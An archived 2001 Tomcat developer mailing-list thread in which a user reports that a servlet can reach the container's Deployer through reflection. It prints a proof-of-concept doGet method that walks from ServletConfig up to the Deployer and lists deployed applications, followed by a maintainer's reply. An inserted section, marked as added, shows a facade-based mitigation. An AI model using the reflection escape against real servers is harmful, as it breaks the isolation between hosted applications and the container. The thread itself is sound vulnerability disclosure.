Posted to dev@tomcat.apache.org by Fabien Le Floc'h <fl...@operamail.com> on 2001/05/11 21:05:42 UTC

container security issue

I apologize for repeating this, but I did not yet get any answer.

I wrote a servlet in a classic WAR file at an arbitrary location and NOT in the org.apache.catalina package. From this servlet, I was able to access a method on the Deployer, i.e. I was able to access anything public in any Container "from outside". This only works by using reflection.

Here is the code (not clean, sorry about that) for the doGet method:

	response.setContentType("text/plain");
	PrintWriter writer = response.getWriter();

	// The ServletConfig handed to the servlet is the container's own Wrapper object.
	Object theWrapper = (Object) this.getServletConfig();
	try {
	    // Wrapper -> Context
	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});
	    Object theContext = method.invoke(theWrapper, new Object[] {});
	    // Context -> Deployer
	    method = theContext.getClass().getMethod("getParent", new Class[] {});
	    Object theDeployer = method.invoke(theContext, new Object[] {});
	    // Call a public Deployer method from inside the web application
	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
	    String[] apps = (String[]) deployedApps;
	    writer.println("detected apps:");
	    for (int i = 0; i < apps.length; i++) {
	        writer.println(apps[i]);
	    }
	} catch (Exception e) {
	    e.printStackTrace();
	    writer.println("An exception occurred when invoking the method, " + e.getMessage());
	}
	writer.flush();
	writer.close();



Conclusion: there is a security issue. We don't need the prerequisite to access Catalina core classes. I am really wondering how it would be possible to fix this security problem without an important redesign.


Regards,


Fabien

P.S.: should I include a WAR file?
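
The exposure described in the post above comes from handing the web application the container's internal object itself. As an added example (not code from the original post or from Tomcat), the sketch below shows the general facade technique for this class of problem: the application receives an object that forwards only the public contract, so the reflective lookup from the post finds no `getParent`. All type names (`Config`, `InternalWrapper`, `ConfigFacade`) are hypothetical stand-ins.

```java
import java.lang.reflect.Method;

// Constructed stand-ins for container types; every name here is hypothetical.
public class FacadeDemo {
    // The contract the web application is meant to see.
    interface Config { String getName(); }

    // Internal object: implements the contract but also exposes getParent().
    public static class InternalWrapper implements Config {
        private final Object parent = "internal-container";
        public String getName() { return "demo-servlet"; }
        public Object getParent() { return parent; }
    }

    // Facade: keeps the internal object private and forwards only the contract.
    public static final class ConfigFacade implements Config {
        private final Config delegate;
        public ConfigFacade(Config delegate) { this.delegate = delegate; }
        public String getName() { return delegate.getName(); }
    }

    // The same lookup the servlet in the post performs:
    // resolve a public getParent() on whatever object was handed over.
    static boolean exposesParent(Object config) {
        try {
            Method m = config.getClass().getMethod("getParent");
            return m.invoke(config) != null;
        } catch (ReflectiveOperationException e) {
            return false; // no such public method on the object we were given
        }
    }

    public static void main(String[] args) {
        Config raw = new InternalWrapper();     // what the servlet received in the post
        Config wrapped = new ConfigFacade(raw); // what a facade would hand out instead
        System.out.println("raw exposes parent:    " + exposesParent(raw));
        System.out.println("facade exposes parent: " + exposesParent(wrapped));
        System.out.println("contract still works:  " + wrapped.getName());
    }
}
```

The facade removes only the public-method path; reflective access to private members still has to be denied by the runtime's access-control policy.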


Re: container security issue

Posted by "Craig R. McClanahan" <cr...@apache.org>.

On 11 May 2001, Fabien Le Floc'h wrote:

> I apologize for repeating this, but I did not yet get any answer.
> 
> I wrote a servlet in a classic WAR file at an arbitrary location and
> NOT in the org.apache.catalina package. From this servlet, I was able
> to access a method on the Deployer, i.e. I was able to access anything
> public in any Container "from outside". This only works by using
> reflection.
> 

I'm investigating this one (and another reported security issue) right
now.  I've got an equivalent test case, so I won't need a war file.

Craig
